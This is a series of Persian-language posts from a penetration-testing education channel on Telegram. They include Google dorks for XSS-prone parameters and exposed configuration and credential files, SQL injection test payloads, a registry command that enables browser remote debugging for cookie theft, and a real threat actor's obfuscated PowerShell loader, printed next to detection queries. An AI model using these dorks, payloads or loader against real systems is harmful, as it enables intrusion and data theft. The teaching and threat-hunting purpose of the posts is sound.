🔥 گوگل دورک - XSS Prone Parameters
@TryHackBox
#دورک #گوگل_دورک #Dork
site:example[.]com inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:&@TryHackBox
#دورک #گوگل_دورک #Dork
❤4
⭕️ دیگر کانال ها و شبکه های اجتماعی ما را دنبال کنید :
💠 کانال های تلگرام ما :
🔶 آموزش تست نفوذ و Red Team
🆔 @TryHackBox
🔶 رودمپ های مختلف
🆔 @TryHackBoxOfficial
🔶 داستان های هک
🆔 @TryHackBoxStory
🔶 آموزش برنامه نویسی
🆔 @TryCodeBox
🔶 رادیو زیروپاد ( پادکست ها )
🆔 @RadioZeroPod
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
👥 گروه های پرسش و پاسخ
🔷 هک و امنیت
🆔 @TryHackBoxGroup
🔷 برنامه نویسی
🆔 @TryCodeBoxGroup
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🔴 اینستاگرام :
🔗 https://www.instagram.com/TryHackBox
🔵 یوتیوب :
🔗 https://youtube.com/@tryhackbox
🟠 گیت هاب ما :
🔗 https://github.com/TryHackBox/
🟣 لینکدین ما :
🔗 https://www.linkedin.com/company/tryhackbox-org
💠 کانال های تلگرام ما :
🔶 آموزش تست نفوذ و Red Team
🆔 @TryHackBox
🔶 رودمپ های مختلف
🆔 @TryHackBoxOfficial
🔶 داستان های هک
🆔 @TryHackBoxStory
🔶 آموزش برنامه نویسی
🆔 @TryCodeBox
🔶 رادیو زیروپاد ( پادکست ها )
🆔 @RadioZeroPod
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
👥 گروه های پرسش و پاسخ
🔷 هک و امنیت
🆔 @TryHackBoxGroup
🔷 برنامه نویسی
🆔 @TryCodeBoxGroup
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🔴 اینستاگرام :
🔗 https://www.instagram.com/TryHackBox
🔵 یوتیوب :
🔗 https://youtube.com/@tryhackbox
🟠 گیت هاب ما :
🔗 https://github.com/TryHackBox/
🟣 لینکدین ما :
🔗 https://www.linkedin.com/company/tryhackbox-org
❤1
#مهندسی_اجتماعی
تو جای هکر بودی، چه داستانی می ساختی؟
سناریو
فرض کن شما کارمند یک سازمان متوسط هستید.
این پیام را در واتساپ کاری دریافت میکنید:
«سلام، من موسوی از واحد فناوری اطلاعات هستم.
طبق بررسی لاگها، سیستم شما به یک IP خارجی متصل شده.
برای جلوگیری از نشت اطلاعات، باید هویت شما تأیید شود.»
❓ سؤال:
آیا این پیام میتواند یک حمله Pretexting باشد؟
کدام بخش پیام اعتمادسازی است؟
کدام بخش ایجاد ترس یا فوریت میکند؟
چه اطلاعاتی عمداً مبهم گفته شده؟
@TryHackBox
تو جای هکر بودی، چه داستانی می ساختی؟
سناریو
فرض کن شما کارمند یک سازمان متوسط هستید.
این پیام را در واتساپ کاری دریافت میکنید:
«سلام، من موسوی از واحد فناوری اطلاعات هستم.
طبق بررسی لاگها، سیستم شما به یک IP خارجی متصل شده.
برای جلوگیری از نشت اطلاعات، باید هویت شما تأیید شود.»
❓ سؤال:
آیا این پیام میتواند یک حمله Pretexting باشد؟
کدام بخش پیام اعتمادسازی است؟
کدام بخش ایجاد ترس یا فوریت میکند؟
چه اطلاعاتی عمداً مبهم گفته شده؟
@TryHackBox
❤4
🔥گوگل دورک - Exposed Configs 🔍
#دورک #گوگل_دورک #Dork
site:example[.]com ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess | ext:json
@TryHackBox #دورک #گوگل_دورک #Dork
❤9🔥2
🎞 مینی دوره #رایگان راهنمای عملی تست نفوذ | قسمت اول مبانی شبکه برای پنتسترها | وایرشارک | WireShark
🔖 راهنمای تست نفوذ یک پلیلیست آموزشی برای یادگیری عملی تست نفوذ است که مفاهیم شبکه، تحلیل ترافیک و شناسایی زیرساخت را بهصورت گامبهگام پوشش میدهد.
🔗 https://youtu.be/G68HYbx9_6o
🆔️ @TryHackBox
🆔️ @TryHackBoxOfficial
🆔️ @TryHackBoxStory
🆔️ @RadioZeroPod
🔖 راهنمای تست نفوذ یک پلیلیست آموزشی برای یادگیری عملی تست نفوذ است که مفاهیم شبکه، تحلیل ترافیک و شناسایی زیرساخت را بهصورت گامبهگام پوشش میدهد.
🔗 https://youtu.be/G68HYbx9_6o
انتقادی داشتید حتما اطلاع بدید، تا بتونیم آموزش با کیفیتتری ارائه بدیم، امیدواریم از آموزش لذت ببرید :)
🆔️ @TryHackBox
🆔️ @TryHackBoxOfficial
🆔️ @TryHackBoxStory
🆔️ @RadioZeroPod
👏8
🔖 بررسی SQL Injection (SQLi) : Blind, Time-Based, Error-Based - بخش اول
🔐 SQL Injection چیست؟
تزریق SQL (SQL Injection) یکی از رایجترین و خطرناکترین آسیبپذیریهای امنیتی است که زمانی رخ میدهد که ورودی کنترلنشدهٔ کاربر مستقیماً داخل یک کوئری SQL قرار بگیرد.
در این حالت، مهاجم میتواند منطق کوئری را تغییر دهد و به دادهها دسترسی غیرمجاز پیدا کند، آنها را تغییر دهد یا حتی حذف کند.
در سناریوهای شدیدتر، SQLi میتواند به اجرای دستورات در سطح سیستمعامل سرور منجر شود.
🧨 انواع SQL Injection
📍 SQL Injection کجا اتفاق میافتد؟
ا SQLi میتواند در هر نقطهای رخ دهد که اپلیکیشن بر اساس ورودی کاربر به دیتابیس کوئری میزند، از جمله:
🕵️ شناسایی SQL Injection
تستهای ساده اولیه:
تستهای پیشرفتهتر (Time‑Based):
تستهای منطقی (Boolean‑Based):
در سناریوهای Blind باید به این نشانهها توجه کرد:
🗄 شناسایی نوع پایگاه داده (Database Engine)
تشخیص دیتابیس بکاند برای طراحی Payload دقیقتر حیاتی است:
MySQL
PostgreSQL
MSSQL
Oracle
#باگ_بانتی
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
🆔 @RadioZeroPod
🔐 SQL Injection چیست؟
تزریق SQL (SQL Injection) یکی از رایجترین و خطرناکترین آسیبپذیریهای امنیتی است که زمانی رخ میدهد که ورودی کنترلنشدهٔ کاربر مستقیماً داخل یک کوئری SQL قرار بگیرد.
در این حالت، مهاجم میتواند منطق کوئری را تغییر دهد و به دادهها دسترسی غیرمجاز پیدا کند، آنها را تغییر دهد یا حتی حذف کند.
در سناریوهای شدیدتر، SQLi میتواند به اجرای دستورات در سطح سیستمعامل سرور منجر شود.
🧨 انواع SQL Injection
1. Classic / Error‑Based SQLi
استفاده از پیامهای خطای SQL که با جزئیات نمایش داده میشوند برای استخراج ساختار دیتابیس (جداول، ستونها و …).
2. Blind SQLi
هیچ خروجی یا خطای مستقیمی وجود ندارد؛ مهاجم نتیجهٔ کوئری را از طریق رفتار برنامه (True / False) استنتاج میکند.
3. Time‑Based Blind SQLi
مبتنی بر ایجاد تأخیر زمانی (مثل SLEEP() یا WAITFOR) برای تشخیص درست یا نادرست بودن شرطها.
4. Out‑of‑Band SQLi
استفاده از کانالهای ارتباطی جانبی مثل DNS یا HTTP Callback برای دریافت داده؛ زمانی کاربرد دارد که نه خروجی وجود دارد و نه تفاوت زمانی قابل تشخیص.
5. Second‑Order SQLi
ورودی مخرب ابتدا در دیتابیس ذخیره میشود و در مرحلهای دیگر (مثلاً هنگام پردازش بعدی) باعث اجرای تزریق SQL میگردد.
📍 SQL Injection کجا اتفاق میافتد؟
ا SQLi میتواند در هر نقطهای رخ دهد که اپلیکیشن بر اساس ورودی کاربر به دیتابیس کوئری میزند، از جمله:
💠فرمهای لاگین
💠 فیلدهای جستجو
💠فیلترها (دستهبندی، تاریخ و …)
💠پارامترهای GET و POST
💠فیلدهای مخفی (Hidden Fields)
💠هدرهای HTTP (User‑Agent، Referer و …)
💠کوکیها
🕵️ شناسایی SQL Injection
تستهای ساده اولیه:
' OR '1'='1
' OR 1=1 --
تستهای پیشرفتهتر (Time‑Based):
' AND SLEEP(5) --
' AND (SELECT 1 FROM dual WHERE SLEEP(5)) --
تستهای منطقی (Boolean‑Based):
' AND 1=1 -- → رفتار عادی
' AND 1=2 -- → رفتار متفاوت
در سناریوهای Blind باید به این نشانهها توجه کرد:
💠 تأخیر زمانی
💠 تفاوت در محتوای صفحه
💠 تغییر HTTP Status Code
💠 تغییر الگوی درخواستهای شبکه
🗄 شناسایی نوع پایگاه داده (Database Engine)
تشخیص دیتابیس بکاند برای طراحی Payload دقیقتر حیاتی است:
MySQL
SELECT version();
SLEEP(5)
PostgreSQL
SELECT current_database();
pg_sleep(5)
MSSQL
SELECT @@version;
WAITFOR DELAY '00:00:05'
Oracle
SELECT banner FROM v$version;
DBMS_LOCK.SLEEP(5)
🔍 شما تا حالا با کدام نوع SQL Injection در پروژه یا تست نفوذ واقعی برخورد داشتهاید؟ تجربتون را در کامنتها به اشتراک بگذارید.
#باگ_بانتی
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
🆔 @RadioZeroPod
👏8
Forwarded from رادیو زیرو پاد
📌 برگزاری جلسه ویس چت : مهندس مهرشاد علیزاده
با درود خدمت دوستان و همراهان عزیز،
در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسهای تخصصی و آموزشی در خصوص واقعیت های باگ بانتی در ایران از جذابیت تا سختی هایی که این حوزه دارد به صورت ویس چت برگزار کنیم.
🎙 مهمان ویژه:
مهندس مهرشاد علیزاده
📅 زمان برگزاری: پنجشنبه 1404/10/11
📍 پلتفرم: تلگرام (ویس چت)
🕗 ساعت : 19:00
🔖 لینک جلسه :
🎙 قسمت اول
⁉️ موضوعات ما :
📖 قسمت اول تعریف واقع بینانه باگ بانتی در ایران
💬 سوالات خود را درباره باگ بانتی در ایران در کامنتهاارسال کنید تا در جلسه به آنها پرداخته شود.
🔔 نکته مهم:
جهت شرکت به موقع جلسه، حتماً کانال تلگرام را چک کنید تا از این جلسه جا نمونید .
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🆔 @RadioZeroPod
🆔 @TryHackBox
با درود خدمت دوستان و همراهان عزیز،
در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسهای تخصصی و آموزشی در خصوص واقعیت های باگ بانتی در ایران از جذابیت تا سختی هایی که این حوزه دارد به صورت ویس چت برگزار کنیم.
🎙 مهمان ویژه:
مهندس مهرشاد علیزاده
📅 زمان برگزاری: پنجشنبه 1404/10/11
📍 پلتفرم: تلگرام (ویس چت)
🕗 ساعت : 19:00
🔖 لینک جلسه :
🎙 قسمت اول
⁉️ موضوعات ما :
📖 قسمت اول تعریف واقع بینانه باگ بانتی در ایران
💬 سوالات خود را درباره باگ بانتی در ایران در کامنتهاارسال کنید تا در جلسه به آنها پرداخته شود.
🔔 نکته مهم:
جهت شرکت به موقع جلسه، حتماً کانال تلگرام را چک کنید تا از این جلسه جا نمونید .
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🆔 @RadioZeroPod
🆔 @TryHackBox
❤6🤔1
💢 یک بکدور مخفی در نسخه PHP وجود داشت که اجازه اجرای کد از راه دور را در هدر user-agent میداد.
@TryHackBox
#backdoor #بکدور #درب_پشتی
✍ حدس بزنید دوستان، این نسخه کدام است؟
@TryHackBox
#backdoor #بکدور #درب_پشتی
👍2
مطمئنم که میدانید مهاجمان از قابلیت «remote debugging» اکسپلویت می کنند تا کوکی ها را از مرورگرهای وب استخراج کنند. امروز بررسی می کنیم که مهاجمان چگونه با تغییر رجیستری این قابلیت را فعال می کنند.
اگر به این گزارش نگاه کنید.
متوجه میشوید که مهاجم از ابزار reg.exe برای تغییر رجیستری و مجاز کردن remote debugging استفاده کرده است:
برای مثال، می توانیم سوءاستفاده از reg.exe را با نشانههای زیر جستوجو کنیم:
یا میتوان تمرکز را روی تغییر رجیستری گذاشت:
➖➖➖➖➖➖➖➖➖➖➖➖➖
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
🆔 @RadioZeroPod
اگر به این گزارش نگاه کنید.
متوجه میشوید که مهاجم از ابزار reg.exe برای تغییر رجیستری و مجاز کردن remote debugging استفاده کرده است:
reg.exe add HKEY_CURRENT_USER\Software\Policies\Google\Chrome /v RemoteDebuggingAllowed /t REG_DWORD /d 1 /f
برای مثال، می توانیم سوءاستفاده از reg.exe را با نشانههای زیر جستوجو کنیم:
event_type: "processcreatewin"
AND
proc_file_path: "reg.exe"
AND
cmdline: "RemoteDebuggingAllowed"
یا میتوان تمرکز را روی تغییر رجیستری گذاشت:
event_type: "registryvaluesetwin"
AND
reg_key_path: "RemoteDebuggingAllowed"
به نظر شما بهترین روش تشخیص و مقابله با چنین سوءاستفادهای در محیطهای سازمانی چیست و چه لاگها یا کنترلهای دیگری را میتوان برای شناسایی زودهنگام آن به کار گرفت؟
➖➖➖➖➖➖➖➖➖➖➖➖➖
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
🆔 @RadioZeroPod
❤1
فرآیند نصب بدافزار اغلب شامل باز کردن (استخراج) دادههای آرشیو شده است.
بیایید به UNC6384 نگاه کنیم.
مهاجم از یک فایل LNK مخرب استفاده کرده که شامل دستور زیر بوده است:
این اسکریپت کارهای زیر را انجام میدهد:
بهدنبال یک فایل ZIP با نام Agenda_Meeting 26 Sep Brussels.zip میگردد
محتوای آن را میخواند
حالا روی tar تمرکز کنیم:
برای مثال، میتوان موارد اجرای tar از طریق PowerShell را جستوجو کرد:
همچنین میتوان بهدنبال استفاده از tar برای استخراج آرشیو در پوشه موقت (Temp) بود:
➖➖➖➖➖➖➖➖➖➖➖➖➖
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
🆔 @RadioZeroPod
امروز بررسی میکنیم که مهاجمان چگونه از ابزار tar اکسپلویت میکنند و چگونه میتوان از این موضوع برای شکار پیش دستانه (Proactive Hunting) استفاده کرد.
بیایید به UNC6384 نگاه کنیم.
مهاجم از یک فایل LNK مخرب استفاده کرده که شامل دستور زیر بوده است:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -c " ;; ;$uojsbmkvp = (get-childitem -Pa $Env:USERPROFILE -Re -Inc *'Agenda_Meeting 26 Sep Brussels'.zip).fullname; ;;$ophcrygyu=[System.IO.File]::ReadAllBytes($uojsbmkvp);$xkasluyk=721; ;$lrbnaoxkomoi=[char]87+'r'+[char]105+'te'+[char]65+'l'+[char]108+'b'+[char]121+'tes'; ;echo $xkasluyk; ; ;echo $xkasluyk;;[System.IO.File]::$lrbnaoxkomoi($Env:temp+'\\rjnlzlkfe.ta', $ophcrygyu[$xkasluyk..($xkasluyk+1204224-1)]); ;;;echo $xkasluyk;;;;echo $xkasluyk;; TaR -xvf $Env:TEMP\rjnlzlkfe.ta -C $Env:Temp; Start-Process $Env:temp\cnmpaui.exe;"
این اسکریپت کارهای زیر را انجام میدهد:
بهدنبال یک فایل ZIP با نام Agenda_Meeting 26 Sep Brussels.zip میگردد
محتوای آن را میخواند
یک بخش پنهان از دادهها که داخل این ZIP جاسازی شده را استخراج میکند (از بایت 721 به بعد)
این بخش پنهان را در یک فایل موقت ذخیره میکند (rjnlzlkfe.ta)
آن را با استفاده از tar استخراج میکند
یک فایل اجرایی را اجرا میکند
cnmpaui.exe :
— یک فایل قانونی که برای side-loading استفاده میشود
حالا روی tar تمرکز کنیم:
tar.exe -xvf C:\Users\<USER>\AppData\Local\Temp\rjnlzlkfe.ta -C C:\Users\<USER>\AppData\Local\Temp
برای مثال، میتوان موارد اجرای tar از طریق PowerShell را جستوجو کرد:
event_type: "processcreatewin"
AND
proc_p_file_path: "powershell.exe"
AND
proc_file_path: "tar.exe"
همچنین میتوان بهدنبال استفاده از tar برای استخراج آرشیو در پوشه موقت (Temp) بود:
event_type: "processcreatewin"
AND
proc_file_path: "tar.exe"
AND
cmdline: ("xvf" AND "temp")
به نظر شما بهترین راه شناسایی اجرای مشکوک tar در سناریوهای واقعی چیست؟
➖➖➖➖➖➖➖➖➖➖➖➖➖
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
🆔 @RadioZeroPod
Arctic Wolf
UNC6384 Weaponizes ZDI-CAN-25373 Vulnerability to Deploy PlugX Against Hungarian and Belgian Diplomatic Entities - Arctic Wolf
Arctic Wolf Labs has identified an active cyber espionage campaign by Chinese-affiliated threat actor UNC6384 targeting European diplomatic entities in Hungary, Belgium, and additional European nations during September and October 2025.
❤3👍2
🚀 در دنیای فناوری اطلاعات و امنیت سایبری، تنها دانستن مفاهیم تئوری و گذروندن دورههای آموزشی کافی نیست — تجربه عملی و مهارت واقعی حرف اول رو میزنن.
🔐 پلتفرم Challenginno.ir با الهام از پلتفرمهایی مثل Hack The Box و TryHackMe، محیطی چالشمحور برای علاقهمندان به امنیت سایبری فراهم کرده؛ جایی که میتونی مهارتهات رو در سناریوهای واقعی تقویت کنی.
🧠 چالشهای متنوعی در حوزههایی مثل:
🔸تست نفوذ و ارزیابی امنیتی
🔸تیم قرمز و تیم آبی
🔸فارنزیک دیجیتال
🔸شکار تهدید (Threat Hunting)
و سایر زمینههای امنیت سایبری منتظر تو هستن!
🔥 همچنین دورههای تخصصی مبتنی بر چالشهای امنیتی و نیز مسابقات مختلف نیز در این پلتفرم برگزار می شن.
📌 اگه دنبال یه مسیر برای یادگیری و تمرین در امنیت سایبری هستی، همین حالا به ما بپیوند:
🌐 وبسایت: https://challenginno.ir
📣 کانال تلگرام: https://t.iss.one/challenginno
🔐 پلتفرم Challenginno.ir با الهام از پلتفرمهایی مثل Hack The Box و TryHackMe، محیطی چالشمحور برای علاقهمندان به امنیت سایبری فراهم کرده؛ جایی که میتونی مهارتهات رو در سناریوهای واقعی تقویت کنی.
🧠 چالشهای متنوعی در حوزههایی مثل:
🔸تست نفوذ و ارزیابی امنیتی
🔸تیم قرمز و تیم آبی
🔸فارنزیک دیجیتال
🔸شکار تهدید (Threat Hunting)
و سایر زمینههای امنیت سایبری منتظر تو هستن!
🔥 همچنین دورههای تخصصی مبتنی بر چالشهای امنیتی و نیز مسابقات مختلف نیز در این پلتفرم برگزار می شن.
📌 اگه دنبال یه مسیر برای یادگیری و تمرین در امنیت سایبری هستی، همین حالا به ما بپیوند:
🌐 وبسایت: https://challenginno.ir
📣 کانال تلگرام: https://t.iss.one/challenginno
👎2